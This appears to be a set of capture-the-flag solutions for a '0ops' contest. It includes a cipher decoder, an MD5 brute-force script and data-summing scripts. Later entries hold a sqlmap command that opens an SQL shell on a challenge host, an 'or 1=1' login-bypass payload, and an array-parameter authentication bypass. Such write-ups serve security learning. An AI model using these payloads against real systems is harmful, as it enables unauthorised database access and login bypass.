Johncode

#!/usr/bin/env python
# -*- coding:utf-8 -*-
#script:decode.py
import hashlib

def decode(msg, key):
    """Recover the plaintext of a "Johncode" message (Python 2 only).

    The input is ROT13 text wrapping Base64 data. After both layers are
    removed, each byte is XORed with a fixed mask and with a one-byte value
    folded from the first 16 characters of ``password`` and the 16 bytes of
    an MD5 token.

    Args:
        msg: The encoded message (ROT13 applied on top of Base64).
        key: String whose MD5 digest is the token for the first byte.

    Returns:
        The decoded string, one output character per decoded input byte.

    Note:
        ``key`` only influences the first output byte: after every byte the
        token is replaced by the MD5 of the ciphertext byte just processed,
        so the rest of the keystream is derivable from the ciphertext alone.
    """
    # Undo the outer text encodings: ROT13 first, then Base64. Both rely on
    # the Python 2 str codecs, which do not exist on Python 3 str objects.
    msg = msg.decode('rot13').decode('base64')
    # 16-byte MD5 digest of the key; used for the first byte only (see Note).
    token = hashlib.md5(key).digest()
    res = ""
    password = "0ops Capture The Flag"

    for c in msg:
        # debug: print ord(c)
        # Fixed mask applied to every byte.
        n = ord(c) ^ 0xde ^ 0xad ^ 0xbe ^ 0xef
        # Fold password[0:16] and all 16 token bytes into the same byte; the
        # remaining characters of password are never read.
        for i in xrange(16):
            n ^= ord(password[i]) ^ ord(token[i])
        res += chr(n)
        # Chain on the ciphertext byte (c), not on the key or the plaintext.
        token = hashlib.md5(c).digest()
    return res

if __name__ == "__main__":
    # Decode the challenge ciphertext with the key "test" and show the result.
    answer = decode("eaxRa8RO8gyXLs/5lZO2jUk32bGGN9DoA5hi1MBswPnWw28pk2f=", "test")
    print "Johncode ans: ", answer

Dict

#!/usr/bin/env python
# -*- coding:utf-8 -*-
#script:dict.py

# Candidate alphabet: the 26 lowercase ASCII letters.
little = 'abcdefghijklmnopqrstuvwxyz'
# Target MD5 hex digest that is_hash() compares each candidate against.
# NOTE: this name shadows the builtin hash() for the rest of the module.
hash = "e79dc003a53edc551c5ef8364e97b2e2"

def is_hash(word):
    """Report ``word`` if md5(word + "0ops!^_^") equals the module-level ``hash``.

    Args:
        word: Candidate string; the fixed suffix "0ops!^_^" is appended
            before hashing.

    Returns:
        None. A match is reported by printing it; a miss prints nothing.
    """
    import hashlib

    # One-shot digest of candidate + fixed suffix, as lowercase hex.
    candidate = hashlib.md5(word + "0ops!^_^").hexdigest()
    if candidate != hash:
        return
    print("md5( " + word + "0ops!^_^ ) = " + hash)

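def r_list(filename):
    """Check every word of a wordlist file against the target hash.

    Args:
        filename: Path to a text file holding one candidate word per line.

    Returns:
        None. Matches are reported by is_hash().
    """
    # The context manager closes the file even if is_hash() raises part-way.
    with open(filename, "r") as fb:
        # Iterate the file directly so a large wordlist is not read into
        # memory in one go.
        for w in fb:
            # Strip only the line terminator. Slicing off the last character
            # would truncate a final line that has no trailing newline and
            # would leave a stray "\r" on CRLF files.
            is_hash(w.rstrip("\r\n"))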

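def attack():
    """Try every four-letter lowercase word against the target hash.

    The keyspace is 26**4 = 456,976 candidates, small enough to enumerate
    exhaustively. Candidates are generated in the same order as four nested
    loops over ``little`` with the first letter varying slowest.

    Returns:
        None. Matches are reported by is_hash().
    """
    import itertools

    # Stream the candidates instead of building the full list, and call
    # is_hash() in a plain loop: map() used only for its side effects
    # allocates a throwaway result list, and does nothing at all where
    # map() is lazy.
    for letters in itertools.product(little, repeat=4):
        is_hash("".join(letters))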

if __name__ == "__main__":
    # The exhaustive four-letter search is the active mode; the wordlist
    # mode, r_list("word.txt"), is left disabled.
    attack()

IPv4

#!/usr/bin/awk -f
#script:ipv4.sh
#usage:ipv4.sh assigned-apnic-20140223 or ipv4.sh delegated-apnic-latest
# Sum field 5 over all records that match the country, type and date filter,
# then print the total.
# NOTE(review): presumably the input follows the APNIC delegation layout
# registry|cc|type|start|value|date|status, so field 5 would be the number of
# addresses in the block - confirm against the input file.
BEGIN{ 
    # Records are pipe-delimited.
    FS="|"
    # IGNORECASE is a gawk extension that makes the regex matches below
    # case-insensitive; in other awk implementations it is an ordinary
    # variable with no effect, so the matches are then case-sensitive.
    IGNORECASE=1
    num=0 
}
{
    # NR>=28 skips the first 27 lines (presumably the file header and summary
    # records - confirm; the offset is hard-coded).
    # $2~/CN/ and $3~/ipv4/ are unanchored matches on fields 2 and 3.
    # $6<=20140223 keeps records whose field 6 is not later than the cutoff
    # (looks like a YYYYMMDD date - confirm).
    if (NR>=28 && $2~/CN/ && $3~/ipv4/ && $6<=20140223)
    {
        num+=$5
    }
}
END{
    # Emit the accumulated total once all input has been read.
    print "IPv4 ans: "num
}

FakeUser

#!/bin/bash
#script:fakeuser.sh

# Keep only the lines of kitty.sql that contain a carriage return.
# NOTE(review): grep is given -r but no file operand. The sed step below
# expects every match to carry a "(standard input):" label, which depends on
# the grep implementation; some versions search the current directory instead
# of reading stdin when -r has no operand. Verify on the system in use.
cat kitty.sql | grep -r $'\r' > kitty_1.sql 2>/dev/null
# Strip the "(standard input):(" prefix, split on commas, and sum the first
# field of every line where that field consists only of digits.
ans=`cat kitty_1.sql|sed 's/(standard input):(//'|awk 'BEGIN{FS=",";num=0;}{if( NR>=1 && $1~/^[0-9]+$/){num+=$1;}}END{print num;}'`
# MD5 of the sum, hashed without a trailing newline (echo -n).
# NOTE(review): `md5` looks like the BSD/macOS utility; Linux systems usually
# ship md5sum, whose output format differs. $ans is expanded unquoted.
ans1=`echo -n $ans | md5`
# Wrap the digest as 0ops{...}.
echo "0ops{"$ans1"}"

Deadline

$ sqlmap -u "http://202.120.7.105:888/?getdeadlineof=1%0Aand%0A1=1" -p "getdeadlineof" --dbms "MySQL" --sql-shell

Spy

送分题
第一关:改数据包
第二关:多提交几次999,中奖概率很高
第三关:提交0或1e111
第四关:十六进制

System

http://202.120.7.107:888/login.php
POST:
username=admin' or 1=1 or '&password=aaaaaaaa

Classic

一开始以为是变形字符,尝试匹配之后不对
后来看是不是分组加密,也不是
最后竟然是滚键盘!!!

Signal

http://202.120.7.106/login_ok.php
POST:
id=222.18.127.138&ps[]=aaaa

Onlyadmin

MySQL和SQL字段截断漏洞